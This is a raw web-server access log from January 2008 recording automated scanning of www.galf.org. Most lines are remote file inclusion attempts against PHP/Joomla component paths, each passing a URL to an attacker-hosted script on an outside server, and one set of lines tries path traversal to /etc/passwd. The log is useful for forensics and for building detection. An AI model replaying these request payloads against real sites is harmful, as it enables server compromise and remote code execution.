209.216.253.218 - - [06/Jan/2008:16:00:01 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.253.218 - - [06/Jan/2008:16:00:01 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.253.218 - - [06/Jan/2008:16:00:01 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.253.218 - - [06/Jan/2008:16:01:23 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.103.160.53 - - [06/Jan/2008:16:04:19 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.159.200.63 - - [06/Jan/2008:16:04:32 -0800] "GET /logs/access.log HTTP/1.0" 200 1297 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:04:45 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:04:45 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:04:45 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.148.27 - - [06/Jan/2008:16:04:50 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
72.55.148.27 - - [06/Jan/2008:16:04:50 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:04:50 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:05:25 -0800] "GET /logs/index2.php?content=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.16.236.69 - - [06/Jan/2008:16:05:25 -0800] "GET /logs/index2.php?content=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:05:25 -0800] "GET /index2.php?content=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:05:25 -0800] "GET /index2.php?content=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.186.169.183 - - [06/Jan/2008:16:05:34 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [06/Jan/2008:16:05:34 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [06/Jan/2008:16:05:34 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:05:58 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:05:58 -0800] "GET //modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:05:58 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.94.98 - - [06/Jan/2008:16:06:03 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
141.30.61.152 - - [06/Jan/2008:16:06:06 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:16:06:47 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:07:07 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:07:07 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:07:07 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:07:12 -0800] "GET /logs/access_071224.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:07:23 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
148.245.107.2 - - [06/Jan/2008:16:07:42 -0800] "GET /logs/index.php?go=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
148.245.107.2 - - [06/Jan/2008:16:07:42 -0800] "GET /index.php?go=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:07:42 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:07:43 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:07:43 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:07:46 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:07:46 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:07:46 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:07:50 -0800] "GET /logs/access_071224.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.226.196 - - [06/Jan/2008:16:07:51 -0800] "GET /logs/access_071224.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:08:06 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:08:07 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:08:07 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:08:09 -0800] "GET /logs/access_071224.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:08:26 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:08:26 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:08:26 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:08:31 -0800] "GET /logs/access_071224.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:09:01 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
208.186.78.42 - - [06/Jan/2008:16:09:09 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:09:31 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:16:09:31 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.222.110.249 - - [06/Jan/2008:16:09:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.225.219.10 - - [06/Jan/2008:16:09:39 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.219.10 - - [06/Jan/2008:16:09:39 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:09:41 -0800] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:09:41 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:09:41 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:09:55 -0800] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:09:58 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:09:58 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.87.84 - - [06/Jan/2008:16:10:05 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
91.121.87.84 - - [06/Jan/2008:16:10:05 -0800] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
67.19.49.228 - - [06/Jan/2008:16:10:07 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.19.49.228 - - [06/Jan/2008:16:10:07 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.academycharter.org/webcalendar/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:10:18 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.94.127 - - [06/Jan/2008:16:10:23 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:10:23 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:10:24 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:10:45 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:10:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:10:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.16.5 - - [06/Jan/2008:16:11:00 -0800] "GET /logs/access_070924.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:11:03 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:04 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:05 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:05 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:05 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:05 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:06 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:06 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:06 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:07 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.103.160.53 - - [06/Jan/2008:16:11:13 -0800] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [06/Jan/2008:16:11:13 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.103.160.53 - - [06/Jan/2008:16:11:22 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:24 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:24 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:25 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:25 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:26 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.94.127 - - [06/Jan/2008:16:11:26 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:11:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:11:36 -0800] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.118.106.191 - - [06/Jan/2008:16:11:39 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.galf.org"
87.118.106.191 - - [06/Jan/2008:16:11:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
69.94.24.226 - - [06/Jan/2008:16:11:40 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:16:12:11 -0800] "GET /logs/admin.php?include_path=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:16:12:11 -0800] "GET /admin.php?include_path=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:12:35 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:16:12:35 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.223.113.2 - - [06/Jan/2008:16:12:38 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:12:52 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:16:12:52 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
91.121.1.54 - - [06/Jan/2008:16:15:03 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.1.54 - - [06/Jan/2008:16:15:04 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.1.54 - - [06/Jan/2008:16:15:04 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:05 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:16 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.155.30 - - [06/Jan/2008:16:16:17 -0800] "GET /logs/access_070910.log//modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.155.30 - - [06/Jan/2008:16:16:17 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.155.30 - - [06/Jan/2008:16:16:18 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.99.250 - - [06/Jan/2008:16:16:18 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.245.38 - - [06/Jan/2008:16:16:58 -0800] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
